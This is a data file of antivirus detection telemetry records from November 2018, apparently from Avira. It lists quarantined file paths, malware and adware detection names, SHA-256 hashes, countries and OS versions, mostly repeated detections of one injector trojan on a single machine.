  Row(detection=Row(filename='avscan-20181102-100239-bd0b4dfb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_03aa77bb\\AVSCAN-20181102-100148-B6DD3C51\\AVSCAN-20181102-100239-BD0B4DFB', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:02:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-184043-5f85546e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a43b94d3\\AVSCAN-20181102-183658-416D5F8F\\AVSCAN-20181102-184043-5F85546E', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:29:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0000762d', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp0000762d', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T15:52:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052255-52c387bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052255-52C387BB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-085741-6457155c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_94e64d75\\AVSCAN-20181102-085632-58407B3F\\AVSCAN-20181102-085741-6457155C', filesize=1536000, name='TR/CoinMiner.BW.#M1.#R1'), hash='51f89e3e19261fc1bfe1a4b1ecfa5c9cc4029d741c66d74629205faa41c57265', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:57:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054651-aabc8e92', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054651-AABC8E92', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-234741-4c5247a8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1296883c\\AVSCAN-20181102-234721-4968C1AD\\AVSCAN-20181102-234741-4C5247A8', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:47:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055303-88367c47', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055303-88367C47', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055611-f84c4427', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055611-F84C4427', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055531-e0ef08a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055531-E0EF08A5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061740-f89c03f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061740-F89C03F5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060022-8e1d79e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060022-8E1D79E3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053618-316b84a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053618-316B84A2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060810-a535e1ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060810-A535E1AC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061851-231a4d0a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061851-231A4D0A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050408-b30c8f89', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050408-B30C8F89', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061716-ea3bae24', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061716-EA3BAE24', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060807-a356aaa9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060807-A356AAA9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053055-70f94695', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053055-70F94695', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050826-4c9332d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050826-4C9332D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053915-9ac6d6c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053915-9AC6D6C6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053942-aabd3830', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053942-AABD3830', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052634-d588cc46', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052634-D588CC46', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052122-1b53647d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052122-1B53647D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055534-e2bb6470', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055534-E2BB6470', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050958-839477f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050958-839477F5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052111-14c79088', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052111-14C79088', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055031-2dabd111', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055031-2DABD111', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052200-31e36928', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052200-31E36928', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062516-086f40e7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062516-086F40E7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055454-cada3113', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055454-CADA3113', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053737-603d0b02', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053737-603D0B02', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050623-037aa90b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050623-037AA90B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T09:38:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052011-f0c2aab0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052011-F0C2AAB0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050835-52105717', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050835-52105717', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060742-947a9682', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060742-947A9682', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062359-daed828c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062359-DAED828C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055718-207ee09c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055718-207EE09C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053457-01652673', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053457-01652673', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fasil', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fasil', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='7a7861079f8bfbb11f413c6082bea20597e46c1b72e952e225c0cab6f75fbb4c', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:26:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054437-5aea03da', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054437-5AEA03DA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051159-cc02f357', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051159-CC02F357', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053717-54d0682e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053717-54D0682E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062453-fad027ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062453-FAD027CA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051724-8d78cc3c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051724-8D78CC3C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051225-db9322a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051225-DB9322A1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054853-f3b5b5b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054853-F3B5B5B6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054437-5b034da9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054437-5B034DA9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060757-9d2e2c58', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060757-9D2E2C58', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053359-dedd1623', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053359-DEDD1623', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062414-e3ce2d7f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062414-E3CE2D7F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055432-bd61cf43', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055432-BD61CF43', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060926-d233d6ea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060926-D233D6EA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='training new 2015.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\MATERI TRAINING NEW 2015\\TRAINING NEW 2015.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:05Z'), dt=datetime.date(2018, 11, 1)),
